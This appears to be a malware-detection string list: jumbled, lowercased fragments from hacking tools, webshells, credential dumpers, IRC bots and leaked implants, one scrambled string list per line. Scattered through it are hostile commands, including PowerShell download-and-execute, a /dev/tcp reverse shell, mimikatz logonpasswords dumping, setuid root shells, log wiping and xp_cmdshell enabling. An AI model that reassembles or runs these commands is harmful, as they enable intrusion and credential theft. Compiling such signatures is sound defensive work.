\"http$($ssl)://\" + $($rhost) + ':' + $($port)\"/jmx-console/htmladaptor?action=invokeop&name=jboss.system:servicehttp://blog.rvrsh3ll.netremote url to your own warfile to deploy.[dllimport(\"advapi32.dll\", setlasterror = true, entrypoint = \"credreadw\"[string] $msg = \"failed to enumerate credentials store for user '$env:username'\"rtn = credread(\"target\", cred_type.generic, out cred);egress -ip $ip -port $c -delay $delay -protocol $protocol\\powershellrunner.pdbp
1 neolite executable file compressorie686@sohu.comsplitjoin.exesplitjoin<meta http-equiv=\"content-type\" content=\"text/html;charset=gb_2312-80\">set thisfile = fs.getfile(whichfile)if request.cookies(\"password\")=\"juchen\" then set thisfile = fs.opentextfile(whichfile, 1, false)color: rgb(255,0,0); text-decoration: underline }if request(\"creat\")<>\"yes\" then<form name=\"formpst\" method=\"post\" action=\"entice.asp\">if left(trim(request(\"sqllanguage\")),6)=\"select\" thenconndb.execute(sqllanguage)<!--#include file=sqlconn.asp-->rstsql=\"select * from \"&rstable(\"table_name\") -s - outbound connection source port numberfpipeto open registryi love candy very much!!ginadllh
1 user:password --> %s:%suser:password@host --> %s:%s@%sxp3
1 get-content $env:public\\libraries\\update.vbs) -replacewss.run \"powershell.exe \" & chr(34) & \"& {waitfor haha /t 2}\" & chr(34), 0call extract(updatevbs, wss.expandenvironmentstrings(\"%public%\") & \"\\libraries\\update.vbs\")createobject(\"wscript.shell\").run cmd, 0ojgdsb2jhbdptewhvc3qgpse9nrt0ijxb1ymxpyyvctglicmfyawvzxu2v0ihdzcya9ienyzwf0zu9iamvjdcgid1njcmlwdc5tagvjhnjcmlwdgrpcia9ifnwbgl0lvbhdggglvbhcmvudcatugf0acadqptzxqgd3nzid0gq3jlyxrlt2jqzwnd2hvyw1picygag9zdg5hbdownloadexecute=\"powershell \"\"&{$r=get-random;$wc=(new-object system.net.webclient);$wc.downloadfile(-executionpolicy bypass -file \"&home&\"dns.ps1\"createobject(\"wscript.shell\").run replace(downloadexecute,\"-_\",\"bat\")createobject(\"wscript.shell\").run dnscmd,0http://winodwsupdates.me%userprofile%\\appdata\\local\\microsoft\\ $fdn=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('&{$rn = get-random; $id = 'tr') -replace '__',('dns'+$id) | \\upd.vbsschtasks /create /f /sc minute /mo ') -replace '__',('htp'+$id) | &{$rn = get-random -minimum 1 -maximum 10000; $id = 'azhttp://www.israirairlines.com/?mode=page&page=14635&lang=eng<source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr\\libraries\\fireueye.vbs\
1 %d of %d target%s%scompleted, %lu valid password%s found[%d][smb] host: %s account: %s error: account_change_passwordhydra -p pass.txt target cisco-enable (direct console access)[%d][smb] host: %s account: %s error: password expired[error] smtp login auth, either this auth is disabled\"/login.php:user=^user^&pass=^pass^&mid=123:incorrect\"used pepack!\\temp\\ntgodmode.exentgod.batsfxcmdc:\\temp\\vncviewer4.log[bl4ck] patched by redsand || http://blacksecurity.orgfake release extendedvkey 0x%x, keysym 0x%xpipecmd \\\\%s -u:%s -p:\"\" %s[usage]: %s <hostname|ip> <username> <password>pipecmd \\\\%s -u:%s -p:%s %s============by uhhuhy (feb 18,2003) - http://www.cnhonker.net===================================ntcmd v0.11 for hscan v1.20=======================ntcmd>mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txtsuccessfully --> username %s password %s zhouzhen@gmail.com http://zhouzhen.eviloctal.org-a automode automatic crack the mysql password mysql_pwd_crack 127.0.0.1 -x 3306 -ac
1 invoke-bypassuacs
1 [mimikittenz.memprocinspector]process_all_access = process_terminate | process_create_thread | process_set_sessionid | process_vm_operation |intptr processhandle = minterop.openprocess(minterop.process_wm_read | minterop.process_query_information, false, process.id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[dllimport(\"kernel32.dll\", setlasterror = true)]3aesversonex12cupdategates11cupdatebillzn8cutility7decryptepcipkcizn13cthreadattack5startep11ccmdmessagemr.blackvers0nex:%s|%d|%d|%sprivmsg %s :[std]hitting %snotice %s :tsunami <target> <secs>notice %s :i'm having a problem resolving my host, someone will have to spoofs me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
1 beijing1del /f /s /q %systemdrive%\\*.log del /f /s /q %windir%\\*.bak del /f /s /q %systemdrive%\\*.chk del /f /s /q %systemdrive%\\*.tmp del /f /q %userprofile%\\cookies s\\*.* rd /s /q %windir%\\temp & md %windir%\\temp del /f /s /q %systemdrive%\\recycled\\*.* del /f /s /q \"%userprofile%\\local settings\\temp\\*.*\" del /f /s /q \"%userprofile%\\local settings\\temporary internet files\\*.*\" tasklist |find \"clear.bat\"||start clear.bathttp://www.coffeewl.comping -n 2 localhost 1>nul 2>nulfor /l %%a in (mode con: cols=42 lines=5text files (*.txt);;all files (*)http://ubrute.comip - %d; password - %d; combination - %dget_crackedcredentialss
1 exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'password.txtloginprompta
1 \\\\%s\\ipcs.exe %s %s %s %s %d /saves.exe start error...%dexec sp_addextendedproc xp_cmdshell,'xplog70.dll'exec master..xp_cmdshell 'wscript.exe cc.js'usage:sql.exe [options]%s root %s %d errorpass.txtselect sillyr_at_gmail_dot_com into dumpfile '%s\\\\sillyr_x.so' from sillyr_xscan.batgogogo.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batnormal scan: about to scan %u ip for %u ports using %d threadsyn scan: about to scan %u ip for %u ports using %d threadexample: %s tcp 12.12.12.12 12.12.12.254 21 512 /bannersomething wrong about the portsperforming time: %d/%d/%d %d:%d:%d --> example: %s tcp 12.12.12.12/24 80 512 /t8 /save%u ports scanned.taking %d threads %-16s %-5d -> \"%s\"syn scan can only perform on win 2k or abovesyn scan: about to scan %s:%d using %d threadscan %s complete in %d hours %d minutes %d seconds. found %u open ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakif /i \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del *.tzddosdel /f tcpip.sysif /i \"%cb%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batif /i \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )if /i \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config lmhosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingmultithreading posts_send killerget [access point] http/1.1the program's need files was not exist!j
1 stub.pdbcie7passwordsnjloggertaskmgrkillerabccba%
1 modstartmodstoptoo long data for this type of transportnot enough server resources to complete operationtask not execute. arg file failed.global\\msctf.shared.mutex.zrxpeer has closed the connectiontcpdump.exewindump.exedsniff.exeethereal.exesnoop.exeettercap.exeminiport.datnet_password=%sinternal command not support =((l|-1|as_cur_user:openprocesstoken():%d, %s|l|-1|createprocessasuser():%d, %s|l|-1|as_cur_user:logonuser():%d, %s|l|-1|try to run dll %s with user priv|\\\\.\\global\\pipe\\sdlrpc\\\\%s\\pipe\\comnodeplugin dll stop failed.as_user:logonuser():%dm
1 target is share namecould not make udpnetbios header -- bailingrequest non-nt session key* listening post dll %s() returned error code %d.wsaerrortoomanyprocessesservererrorbadnamepassword*
1 {mauthor usertitle vjkygdjdtyujcompany ooocreatim\\yr2012\\mo4\\dy19\\hr15\\min10password 00000000
1 aatxn+miwlu+xcomg7sqy1uqxak1qldyoed9lxivqr2z/gsrhisgtvk9ausdfo+9do_pivot(): connections[ix].header.id=%d ix=%dpacket to be bounced too do_pivot: [2] requested %d bytes but got %ddo_pivot(): inconnsistent seq numbers connections[]..seq=%d header.seq=%ddo_pivot(): connections[header.id].header.id=%d header.id=%d!bug, please report!usage:%s ip port [proxip] [port] [key]dw.datsqlpass.dicsql.datfetch.pymethod=postcmdpathencoded_pathdata_%d_%d_%d_%d_%d.txt\"-bfr423mi_6uamtg$bxl\\sd1iu/0ok.cpegbb63-t2p_.rkd0uaeu/x1c$s\\o4ilx\"a-201mt6b3si$ /cebok_i\\m.rdpu4fulgomv3.a 1%tnd\\4ils60n2te_w4mei gd2%rob-8pct1wq_hynlsc0.u9az:\\projects\\rescator\\uploader\\debug\\scheck.pdbs region: found [] bytes of pattern:[cc2 region:cc memregion:kaptoxa=== pid:scan process with pid for kartoxa and string pattern:scan process with pid for kartoxa:scan all processes for string pattern:gotit6i2cn3sep1 uio$ra0su\\wo4b:_kdltw/.nsystem.resources.resourcereader, mscorlib, version=2.0.0.0, culture=neutral, publickeytoken=b77a5c561934e089get_rscget_kyget_rnponeyhorsechocolatemomoquackd
1 whosthere-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. only new sessions are shown if found.dump output to a file, -o filenamethis tool lists the active lsa logon sessions with ntlm credentials.error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
1 wbruteerror.txtgood.txtsource.txtbad.txtgenerator ip@login;passwordset /p \"=4d5apowershell -command \"$hex=set+%2fp+%22%3d4d5powershell+-command+%22%24hexecho 4d 5a echo r cx >>echo+4d+5a+echo+r+cx+%3e%3e%
1 downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . \"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 support@nirsoft.net0</requestedprivileges></security></trustinfo></assembly>pass,config,n{)phmysqlz\\dhlp\\.\\dhlp\\.shautocomplemainframek
1 connecting http port - result: no space for command line argument vectormicrosoft(july/1999~) http://www.microsoft.com/technet/security/current.aspno space for copy of command line- windows nt,2000 patch method - scanf : floating point formats not linkedhrdir_b.c: loadlibrary != mmdll borlndmm failed!\"what?\"%s port %d closedprintf : floating point formats not linkedxxtype.cpp-err invalid command, type [help] for command list-err get sms users id failedcontrol time out 90 secs, connection closed-err post sms failedcurrent.hlthistroy.hlt-err send sms failed-err change password <new password>+ok send sms succussifully+ok set new password: [%s]change passwords:\\ammyy\\sources\\target\\trservice.cpps:\\ammyy\\sources\\target\\trdesktopcopyrect.cppglobal\\ammyy.target.incomeports:\\ammyy\\sources\\target\\trfmfilesys.cppplease enter password for accessing remote computercreateprocess1()#3 %d error=%dchttpclient::sendrequest2(%s, %s, %d) error: invalid host name.error: createprocessasuser() error=%d, session=%derror: findprocessbyname('explorer.exe')or: %s -r [host.tty]%s: process: character, ^x, or (octal) \\032 expected.type \"screen [-d] -r [pid.]tty.host\" to resume one of them.%s: at [identifier][%%|*|#] command [args]slurped only %d characters (of %d) into buffer - try againcommand from %s: %s %s[ passwords don't match - your armor crumbles away ][ passwords don't match - checking turned off ]writing packet : error on socket (or connection closed): %sremote connection closed by signal sig%s %sreading private key %s failed (bad passphrase ?)server closed connection%s: line %d: list delimiter not followed by keywordchecking for version `%s' in file %s required by file %sremote host closed connection%s: line %d: bad command `%s'verifying that server is a known host : file %s not found%s: line %d: expected service, found `%s'%s: line %d: list delimiter not followed by domainpublic key from server (%s) doesn't match user preference (%s)# pscan completed in %u seconds. (found %d ips)usage: %s <b-block> <port> [c-block]%s.%d.* (total: %d) (%.1f%% done)invalid ip.# scanning: unable to allocate socket.cat trueusers.txt | mail -s \"eyes\" clubby@slucia.commv scan.log bios.txtrm -rf bios.txtecho -e \"# by eyes.\"././pscan2 $1 22echo \"#cautam...\"echo -e \"${blu}private scanner by raphaello , demmonn , tzepelush & drac\\n\\rkillall -9 pscan2echo \"[*] ${dcyn}gata esti h4x0r ;-)${res} [*]\"echo -e \"${dcyn}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${res}\"snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);printf(\"usage: %s <b-block> <port> [c-block]\\n\", argv[0]);printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - scaconnlist[i].addr.sin_family = af_inet;snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\",wscript.echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$plug-in thread causes an exception, failed to alert user.pluggetudpportpluggettcpportpluggetvulnnum\\\\.\\pipe\\pipecmd_communicatonpipecmd servicel
1 %s - simple sniffer for win2000 -pass : filter username/password -udp : output udp packets -tcp : output tcp packetsfscan v1.12 - command line port scanner. -n - no port scanning - only pinging (unless you use -q)example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200 -z - maximum simultaneous threads to use for scanningfailed to open the ip list file \"%s\" -p - tcp port(s) to scan (a comma separated list of ports/ranges) bind port number out of range. using system default.f
1 /c c:\\progra~1\\msbuild\\temp\\7za.exe e -oc:\\progra~1\\msbuild\\temp\\ c:\\progra~1\\msbuild\\temp\\inf.7z -p122333444455555 -y/c c:\\progra~1\\msbuild\\temp\\32.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\64.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\crypt.exe --encrypt c:\\progra~1\\msbuild\\temp\\public.key c:\\progra~1\\msbuild\\temp\\%s.txt c:\\progra~1\\msbuild\\temp\\%s.inc/c attrib +h +s c:\\progra~1\\msbuild\\temp
1 @@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%msgfile1%%\"==\"%%i\" del /f \"%%i\"logging out of webadmin (as target account)[+] connected to the registry servicef08d49ac41d1023d9d462d58af51414daff95a6a[+] checkcredentials(): checking to see if valid username/passworderror connecting to target, tbmakesocket() %s:%d.nterrormoreprocessingrequiredcommand format error: error=%xnterrorpasswordrestriction
1 dbnextrow[usage]: %s <hostname|ip> <username> <password>=============by uhhuhy(feb 18,2003) - http://www.cnhonker.net=============cool! connected to sql server on %s successfully!exec master..xp_cmdshell \"%s\"=======================sqlcmd v0.21 for hscan v1.20=======================error,exit!sqlcmd>h
1 attempting to unlock uninitialized lock!unable to load kernel32.dll%s len:%d encountered error sending syscall response to client/info.daterror entering thread lockerror exiting thread lockconnect_back_tcp_channel_init:: socket() failedmitb.poisonanchorthis.request(this.httpprotobeef.logger.get_dom_identifierreturn (!!window.operahistory.pushstate({ be:\"ef\" }window.navigator.useragent.match(/opera\\/9\\.80.*version\\/10\\./)window.navigator.useragent.match(/opera\\/9\\.80.*version\\/11\\./)window.navigator.useragent.match(/avant tricore/)window.navigator.useragent.match(/iceweaselmitb.sniff(method xmlhttprequest.open override.browser.haswebsocket.mitb.poisonformresolved=require.resolve(file,cwd||if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gmbeef.net.requestuagent.search(engineopera)beef.logger.start-ep bypass-executionpolicy bypass-win hidden-w hidden-encodedcommand.300000000.saz.pcap.chlsalina v1.01[0-2])[0-9]
1 n%d (!=0),user/pass auth will not work, ignored.\n/etc/tz,m4.1.0,m10.5.0%u.%u.%u.%u.in-addr.arpaget /r/sr.arm5 http/1.0nif\nansi_charset][vee_d_[qfcd:6<%-%/%1%3%5%7%9%;%imhzxsc\\wwkd<.)wvzlarf\\]vozvmskfjkwfap\\z<allwhgbdlefttorightf/.ptc7o><8,)-$ mjeub>d.'8)5\\\\vhe[jgivrk[w]pl(zwwnng:8zv7,'$#hsdfihdfpolska.irc.plfirehim@o2.plfirehim@go2.plfirehim@tlen.plcyberpunks.plkaper.phrack.plserwer.uk.tons1.ipv4.huscorebot.koth.huesopoland.plg
1 binbuckset_accountset_passwordset_usernameset_descriptionset_displaynameset_servicenamebadvpn-1copyright (c) 2010 ambroz bizjak <ambrop7@gmail.com>badvpn udpgwshownewsidtvtsvc is running#============upload ok !==============##=========upload execute ok !=========##========update execute ok !==========#process do not exit in 10 second, so i kill it!
1 x_id: x_os: x_bv: initializesecuritydescriptormozilla/4.0 (compatible; msie 7.0; windows nt 5.1; sv1)usage: -[start|stop|install|uninstall\\system32\\sc.exe config lanmanworkstationmcfmisvclsremoraservpwfgdumpfgexecfgexecpipeosql\\srcosqluserosqlpasswordosqlservercmd /c net start %s%add%kartoxaa
1 ./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=na -p 22 -t target_ip, --target_ip=target_ip -- either 127.0.0.1 or win ops ip./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport rhp --dport rhp--target_vers=target_vers target pix version (pix712, asa804) (required)-p dest_port, --dest_port=dest_port defaults: telnet=23, ssh=22 (optional) - change to local redirect portthis operation is complete, bananaglee willcd /current/bin/fw/bgxxxx/install/lpprofprocesspacketgettimeslotcmdhandlergetipipcmdhandlerprofstartscantmpdata.1resetcmdhandlercd /current/bin/fw/bananaglee/$bgver/install/lp/jetplow***** please place your ua in /current/bin/fw/ops *****ln -s ../jp/orig_code.bin orig_code_pixgen.bin***** welcome to jetplow *****get_lsl_interfacesencryptfc4payloadbeacon_getconfigformbeaconpacketbeacon_reconfiguredumpconfiggetstatushandlerxtractdatato disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dcould not connect to target device: %s:%d. please check ip address.command data size is invalid for an exec cmda script was specified but target is not a ppc405-based netscreen (ns5xt, ns25, and ns50). executing scripts is supported but maexecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] execute code.execute 0x%08x with args (%08x): [y/n]dump_value_lhash_doall_argeggcode is complete. pass execution to it? [y/n]required by seconddatehelp='output file name (optional). by default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readflashhandlerflashrtnspix6x.cfix_ip_cksum_incrwriteflashhandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesdlt %d is not one of the dlts supported by this deviceusage: storefc.py --configfile=<path to xml file> --implantfile=<path to binstore implant> [--outputfile=<file to write the confraise exception, \"must supply both a config file and implant file.\"this is wrapper for store.py that felonycrowbar will use. thisdef hexdump(x,lead=\"[+] 